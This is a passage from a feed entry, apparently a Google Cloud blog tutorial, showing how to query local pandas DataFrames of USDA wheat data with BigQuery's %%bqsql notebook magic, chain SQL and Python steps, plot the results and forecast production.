    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;jupyter lab&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fcbc9bdefd0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;6. Open a web browser to the URL listed in the output. It will be something like &lt;/span&gt;&lt;a href="http://localhost:8888/lab?token=somesupersecretvaluehere" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;http://localhost:8888/lab?token=somesupersecretvaluehere&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; .&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;7. Create a new notebook using the Jupyter Lab UI (File &amp;gt; New &amp;gt; Notebook). Alternatively, download the &lt;/span&gt;&lt;a href="https://github.com/googleapis/google-cloud-python/blob/main/packages/bigframes/notebooks/dataframes/magics_with_local_data.ipynb" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;notebook associated with this tutorial from the BigQuery DataFrames GitHub repository&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and open it.&lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;Accessing and preparing local data&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In this tutorial, you'll analyze the &lt;/span&gt;&lt;a href="https://www.ers.usda.gov/data-products/wheat-data" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;USDA wheat data&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. Pandas will download the data, mimicking a typical local data analysis workflow.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;url = &amp;quot;https://www.ers.usda.gov/media/5706/wheat-data-all-years.xlsx?v=52690&amp;quot;&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fcbc9bde100&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Next, read the data into a local pandas DataFrame. Use the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;pyarrow&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;dtype_backend&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; when preparing local pandas data for SQL processing. This ensures more consistent handling of NULL values and seamless schema mapping when you hand off the data to the BigQuery SQL engine. For this example, read the 'Table05' sheet, which contains annual wheat supply and disappearance data:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;import pandas as pd\r\n\r\ndf = pd.read_excel(\r\n    url,\r\n    sheet_name=&amp;quot;Table05&amp;quot;,\r\n    dtype_backend=&amp;quot;pyarrow&amp;quot;,\r\n    engine=&amp;quot;calamine&amp;quot;,\r\n    header=1,  # Skip the first row.\r\n)\r\ndf&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fcbc9bdec40&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Before querying the local DataFrame with SQL, ensure that the column names are SQL-friendly. BigQuery supports &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/schemas#flexible-column-names"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;flexible column names&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, allowing most unicode characters, but special characters like "/" and "" must be removed or replaced.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;df.columns = [name.replace(&amp;quot;/&amp;quot;, &amp;quot;&amp;quot;) for name in df.columns]\r\ndf&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fcbc9bde1c0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Perform a basic filter using standard Python/pandas syntax to remove rows with missing data. This represents the initial Python-only stage of a processing chain.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;quot;full_rows = df[~df[&amp;#x27;Beginning stocks&amp;#x27;].isna()]\r\nfull_rows&amp;quot;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fcbc9bdedc0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h2&gt;&lt;strong style="vertical-align: baseline;"&gt;Initializing the BigQuery SQL magic&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The BigQuery DataFrames library provides the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;%%bqsql&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; magic, which acts as the bridge between your Python and SQL environments. It allows the BigQuery query engine to directly reference and query your local pandas DataFrames (by implicitly uploading them as temporary tables) as well as actual BigQuery tables and external tables in GCS (Parquet, Iceberg, CSV).&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To enable this integration in your notebook, load the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;bigframes&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; extension.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;%load_ext bigframes&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fcbc9bde160&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Note:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; The extension is pre-loaded in BigQuery Studio and Colab environments.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To ensure the correct Google Cloud project is billed for query usage, including free tier usage, configure the project ID used by the magics. Even in the free sandbox tier, a project ID is required to allocate query resources. If you don't set it explicitly, BigFrames will try to discover it from your environment (e.g., your Application Default Credentials).&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;import bigframes.pandas as bpd\r\n\r\nbpd.options.bigquery.project = &amp;quot;your-project-id-here&amp;quot;&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fcbc9bdef70&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;Querying local pandas DataFrames with SQL&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;With the project configured, you can now run SQL queries directly against your local pandas DataFrame (&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;full_rows&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;) as if it were a table in BigQuery. Simply reference the variable name inside braces &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;{full_rows}&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; in your SQL query. You may be prompted for an authorization code, which you'll obtain by following the link provided as part of the same message.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;%%bqsql\r\nSELECT * FROM {full_rows}&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fcbc9bde250&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;Chaining SQL and Python: Saving SQL Results&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The true power of the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;%%bqsql&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; magic lies in chaining. By providing a destination variable name as an argument to &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;%%bqsql&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; (e.g., &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;%%bqsql destination_var&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;), the query result is saved as a BigQuery DataFrame to that variable.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This DataFrame lives on the BigQuery engine but behaves like a pandas DataFrame in Python. You can immediately use it in subsequent Python cells, or reference it again in another SQL cell. This allows you to build a multi-step, hybrid processing pipeline.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Filter the data to only yearly entries using SQL, and save the result into a new BigFrames DataFrame named yearly:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;quot;%%bqsql yearly\r\nSELECT *\r\nFROM {full_rows}\r\nWHERE STARTS_WITH(`Time period`, &amp;#x27;MY&amp;#x27;)&amp;quot;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fcbc9bde550&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Now, you can chain another SQL operation. Reference the yearly BigFrames DataFrame that you just created, extract the year using SQL regular expressions, cast it to a timestamp, and save the results into a new BigFrames DataFrame named &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;timeseries&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;quot;%%bqsql timeseries\r\nSELECT\r\n  * EXCEPT (`Marketing year 1`),\r\n  TIMESTAMP(CONCAT(\r\n    REGEXP_EXTRACT(`Marketing year 1`, r&amp;#x27;([0-9]+)\\/&amp;#x27;),\r\n    &amp;#x27;-01-01&amp;#x27;)) AS `year`\r\nFROM {yearly}&amp;quot;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fcbc9bde310&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Notice how you are building a chain from Python to SQL and back again.&lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;Returning to Python for visualization&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Now that you've completed some SQL transformations, you can chain back to Python for visualization. Because BigFrames DataFrames implement the pandas API, you can call standard visualization methods (like &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;.plot.line()&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;) directly on the timeseries DataFrame without downloading the full dataset first. The computations happen in BigQuery, and only the summarized chart data is sent back to the notebook.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;quot;timeseries.set_index(&amp;#x27;year&amp;#x27;).sort_index().plot.line()&amp;quot;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fcbc9bdeaf0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Alternatively, download the time series as a pandas DataFrame to use with your visualization library of choice.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;quot;pddf = timeseries.set_index(&amp;#x27;year&amp;#x27;).sort_index().to_pandas()&amp;quot;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fcbc9bdec70&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h2&gt;&lt;strong style="vertical-align: baseline;"&gt;Why a hybrid pipeline matters&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By pairing BigQuery DataFrames with  &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;%%bqsql&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; magics, you have built a powerful, interoperable pipeline that seamlessly transitions between SQL and Python.&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;local pandas &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;df&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;full_rows&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; DataFrames&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;to SQL filter&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;to BigFrames &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;yearly&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; DataFrame&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;to SQL transform&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;to BigFrames &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;timeseries&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; DataFrame&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;to Python data visualization&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;to local pandas DataFrame.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This architecture offers key advantages:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Optimal tool selection&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Use SQL for what it does best (heavy aggregations, window functions, and complex joins) and Python for what it does best (visualization, statistical modeling, and ML orchestration).&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Improved code readability&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Instead of writing massive SQL queries with dozens of common table expressions (CTEs), or doing complex aggregations using pandas APIs which are often convoluted compared to SQL, you can split your pipeline into logical steps, alternating between SQL and Python.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Seamless scaling&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: The exact same &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;%%bqsql&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; code can scale from a tiny local pandas DataFrame to billions of rows in a production BigQuery table. You only need to swap the initial local pandas DataFrame with a BigQuery DataFrame reference.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;Next steps and scaling up&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Check out the &lt;/span&gt;&lt;a href="https://dataframes.bigquery.dev/user_guide/index.html" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;other notebooks&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; in the &lt;/span&gt;&lt;a href="https://dataframes.bigquery.dev/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;BigFrames API reference site&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. In addition to the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;%%bqsql&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; cell magic, BigFrames also registers a &lt;/span&gt;&lt;a href="https://dataframes.bigquery.dev/reference/index.html#pandas-extensions" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;BigQuery Accessor&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; on standard pandas DataFrames, allowing you to run SQL scalar functions directly on local pandas data.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For example, you can call powerful Google Cloud community &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/user-defined-functions"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;UDFs&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; from &lt;/span&gt;&lt;a href="https://github.com/GoogleCloudPlatform/bigquery-utils/tree/master/udfs#bigquery-udfs" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;BigQuery Utils&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://unytics.io/bigfunctions/bigfunctions/#function-categories" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;BigFunctions&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, or &lt;/span&gt;&lt;a href="https://docs.carto.com/data-and-analysis/analytics-toolbox-for-bigquery" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;CARTO Analytics Toolbox for BigQuery&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; using &lt;/span&gt;&lt;a href="https://dataframes.bigquery.dev/reference/api/bigframes.bigquery.sql_scalar.html" rel="noopener" target="_blank"&gt;&lt;code style="text-decoration: underline; vertical-align: baseline;"&gt;df.bigquery.sql_scalar(...)&lt;/code&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;import pandas as pd\r\nimport bigframes.pandas as bpd  # Registers the accessor\r\n\r\nbpd.options.bigquery.project = &amp;quot;your-project-id&amp;quot;\r\ndf = pd.DataFrame({&amp;quot;x&amp;quot;: [1, 2, 3]})\r\npandas_s = df.bigquery.sql_scalar(&amp;quot;`bqutil`.fn.cw_setbit({x}, 2)&amp;quot;)&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fcbc9bde8e0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;While the BigQuery sandbox offers a powerful environment to test these hybrid Python-SQL workflows for free, some advanced features like BigQuery Machine Learning (BQML) are restricted. By connecting a billing account to your Google Cloud project, you can unlock advanced capabilities such as the &lt;/span&gt;&lt;a href="https://dataframes.bigquery.dev/reference/api/bigframes.bigquery.ai.forecast.html#bigframes.bigquery.ai.forecast" rel="noopener" target="_blank"&gt;&lt;code style="text-decoration: underline; vertical-align: baseline;"&gt;bigframes.bigquery.ai.forecast&lt;/code&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; function to predict time-series data using Google's state-of-the-art foundational models directly from your SQL/Python chain.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;forecasted_pandas_df = (\r\n    pddf\r\n    .reset_index(drop=False)\r\n    .bigquery.ai.forecast(\r\n        data_col=&amp;quot;Production&amp;quot;,\r\n        timestamp_col=&amp;quot;year&amp;quot;,\r\n        horizon=10,\r\n    )\r\n)\r\n\r\n# Plot the results\r\nforecasted_pandas_df_sorted = forecasted_pandas_df.sort_values(by=\&amp;#x27;forecast_timestamp\&amp;#x27;)\r\nplt.plot(pddf.index, pddf[\&amp;#x27;Production\&amp;#x27;], label=\&amp;#x27;Real Production\&amp;#x27;, color=\&amp;#x27;blue\&amp;#x27;)\r\nplt.plot(forecasted_pandas_df_sorted[\&amp;#x27;forecast_timestamp\&amp;#x27;], forecasted_pandas_df_sorted[\&amp;#x27;forecast_value\&amp;#x27;], label=\&amp;#x27;Forecasted Production\&amp;#x27;, color=\&amp;#x27;red\&amp;#x27;, linestyle=\&amp;#x27;--\&amp;#x27;)\r\nplt.fill_between(\r\n   forecasted_pandas_df_sorted[\&amp;#x27;forecast_timestamp\&amp;#x27;],\r\n   forecasted_pandas_df_sorted[\&amp;#x27;prediction_interval_lower_bound\&amp;#x27;],\r\n   forecasted_pandas_df_sorted[\&amp;#x27;prediction_interval_upper_bound\&amp;#x27;],\r\n   color=\&amp;#x27;red\&amp;#x27;,\r\n   alpha=0.2,\r\n   label=\&amp;#x27;Confidence Interval\&amp;#x27;\r\n)\r\n# ...\r\nplt.show()&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fcbc9bde5b0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="image1" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/image1_NjiKU61.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The BigFrames team would love to hear your feedback on the hybrid Python-SQL experience:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Email&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: &lt;/span&gt;&lt;a href="mailto:bigframes-feedback@google.com"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;bigframes-feedback@google.com&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Issues&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: File bug reports or feature requests on the &lt;/span&gt;&lt;a href="https://github.com/googleapis/google-cloud-python/issues" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;open-source BigFrames repository&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Updates&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: To receive news and updates, subscribe to the &lt;/span&gt;&lt;a href="https://docs.google.com/forms/d/10EnDyYdYUW9HvelHYuBRC8L3GdGVl3rX0aroinbRZyc/edit?resourcekey=0-QUsnpzF91gm9hsp04rSA6Q" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;BigFrames email list&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Learn more:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Read the BigFrames API reference and user guides in the &lt;/span&gt;&lt;a href="https://dataframes.bigquery.dev/index.html" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;documentation&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/data-analytics/bridge-sql-and-python-with-bigquery" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-07-16T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/topics/developers-practitioners/what-we-learned-about-agent-teamwork</id>
    <title>What 10 autonomous film crews taught us about agent teamwork</title>
    <updated>2026-07-16T16:00:00+00:00</updated>
